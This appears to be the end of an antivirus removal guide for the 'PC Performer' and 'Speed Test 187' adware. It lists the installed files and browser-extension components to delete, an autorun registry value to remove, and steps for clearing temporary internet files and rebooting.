    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.ico (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\install.rdf (987 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\options.xul (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\rjs.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.ico (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.ico (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.png (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\skin\framework.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\config.js (205 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\subscriptloader.js (547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\content.js (66 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\icon.png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.js (491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.js (1256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.xul (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\background.html (118 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.png (973 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome.manifest (320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.ico (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.png (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.xml (1 bytes)
    %Program Files%\PC Performer\is-TI75V.tmp (673 bytes)
    %Program Files%\PC Performer\unins000.dat (9720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\PC Performer\is-FK08C.tmp (32429 bytes)
    %Program Files%\PC Performer\is-LO644.tmp (601 bytes)
    %Program Files%\PC Performer\is-0MQOJ.tmp (601 bytes)
    %System%\roboot.exe (17 bytes)
    %Program Files%\PC Performer\is-88KFP.tmp (10177 bytes)
    %Program Files%\PC Performer\is-OR8M6.tmp (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\PC Performer\Uninstall PC Performer.lnk (722 bytes)
    %Program Files%\PC Performer\is-RFK2G.tmp (601 bytes)
    %Program Files%\PC Performer\is-J0TH5.tmp (673 bytes)
    %Program Files%\PC Performer\is-CLLEA.tmp (601 bytes)
    %Program Files%\PC Performer\is-DRJ95.tmp (673 bytes)
    %Program Files%\PC Performer\is-US574.tmp (601 bytes)
    %Program Files%\PC Performer\is-ET5QL.tmp (601 bytes)
    %Program Files%\PC Performer\is-E9OU8.tmp (54184 bytes)
    %Program Files%\PC Performer\is-KJP91.tmp (601 bytes)
    %Program Files%\PC Performer\is-LDHVJ.tmp (601 bytes)
    %Program Files%\PC Performer\is-6F8RF.tmp (46 bytes)
    %Program Files%\PC Performer\is-UQFA0.tmp (601 bytes)
    %Program Files%\PC Performer\is-EIDVD.tmp (601 bytes)
    %Program Files%\PC Performer\is-R0INF.tmp (45 bytes)
    %Program Files%\PC Performer\is-JH9KP.tmp (601 bytes)
    %Documents and Settings%\All Users\Desktop\PC Performer.lnk (725 bytes)
    %Program Files%\PC Performer\unins000.msg (302 bytes)
    %Program Files%\PC Performer\is-O468T.tmp (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\PC Performer\PC Performer.lnk (737 bytes)
    %Program Files%\PC Performer\is-5Q9FR.tmp (601 bytes)
    %Program Files%\PC Performer\is-T36CQ.tmp (601 bytes)
    %Program Files%\PC Performer\is-0S898.tmp (601 bytes)
    %Program Files%\PC Performer\is-QUT18.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\roboot.exe (17 bytes)
    %Program Files%\PC Performer\is-UG752.tmp (57 bytes)
    %Program Files%\PC Performer\is-3J2TL.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll (2218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\StdUtils.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\speedtest187Setup[1].exe (122458 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\PCPerformerSetup.exe (201724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\PCPerformerSetup_genericv3[1].exe (201724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\country[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    C:\END (156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\domain.txt (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\country.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\SpeedTest.exe (122458 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp\PCPerformerSetup.tmp (7386 bytes)
    %WinDir%\Tasks\PC Performer_UPDATES.job (268 bytes)
    %WinDir%\Tasks\PC Performer_DEFAULT.job (260 bytes)
    %Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\log_08-09-2014.log (8116 bytes)
    %Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\eng_rcp.dat (3172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\bin\DeskTopIcon.ico (16 bytes)
    %Program Files%\Speed Test 187\speedtest187.ico (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.exe (71964 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.xpi (9544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\DeskTopIcon.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper.exe (53430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_FF.exe (6841 bytes)
    %Documents and Settings%\%current user%\Desktop\Speed Test.lnk (1 bytes)
    %Program Files%\Speed Test 187\uninstall_nsis.exe (740 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.crx (8658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_IE.exe (6841 bytes)
    %Program Files%\Speed Test 187\config.xml (1 bytes)
    %Program Files%\Speed Test 187\icon32.png (3 bytes)
    %Program Files%\Speed Test 187\AddonsFramework.Typelib64.dll (548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\UAC.dll (13 bytes)
    %Program Files%\Speed Test 187\options.htm (780 bytes)
    %Program Files%\Speed Test 187\icon24.png (2 bytes)
    %Program Files%\Speed Test 187\icon48.ico (25 bytes)
    %Program Files%\Speed Test 187\ButtonSite.dll (7938 bytes)
    %Program Files%\Speed Test 187\json2.min.js (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\ie9install.bmp (2712 bytes)
    %Program Files%\Speed Test 187\content.js (66 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\help_page.ini (1537 bytes)
    %Program Files%\Speed Test 187\jquery-1.9.1.min.js (2410 bytes)
    %Program Files%\Speed Test 187\icon24.ico (2 bytes)
    %Program Files%\Speed Test 187\icon16.png (1 bytes)
    %Program Files%\Speed Test 187\icon64.ico (25 bytes)
    %Program Files%\Speed Test 187\background.html (939 bytes)
    %Program Files%\Speed Test 187\uninstall.exe (794 bytes)
    %Program Files%\Speed Test 187\icon32.ico (10 bytes)
    %Program Files%\Speed Test 187\icon16.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\System.dll (11 bytes)
    %Program Files%\Speed Test 187\icon128.png (647 bytes)
    %Program Files%\Speed Test 187\icon128.ico (25 bytes)
    %Program Files%\Speed Test 187\ButtonSite64.dll (10790 bytes)
    %Program Files%\Speed Test 187\updater.js (3 bytes)
    %Program Files%\Speed Test 187\AddonsFramework.Typelib.dll (2128 bytes)
    %Program Files%\Speed Test 187\BackgroundHost.exe (15235 bytes)
    %Program Files%\Speed Test 187\BackgroundHost64.exe (15445 bytes)
    %Program Files%\Speed Test 187\icon18.png (1 bytes)
    %Program Files%\Speed Test 187\rjs.js (1 bytes)
    %Program Files%\Speed Test 187\icon64.png (7 bytes)
    %Program Files%\Speed Test 187\ScriptHost64.dll (10843 bytes)
    %Program Files%\Speed Test 187\button.js (491 bytes)
    %Program Files%\Speed Test 187\icon48.png (5 bytes)
    %Program Files%\Speed Test 187\ScriptHost.dll (9711 bytes)
    %Program Files%\Speed Test 187\updaterWrapper.js (2 bytes)
    %Program Files%\Speed Test 187\icon18.ico (2 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "RDReminder" = "%Program Files%\PC Performer\PCPerformer.exe -rem"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
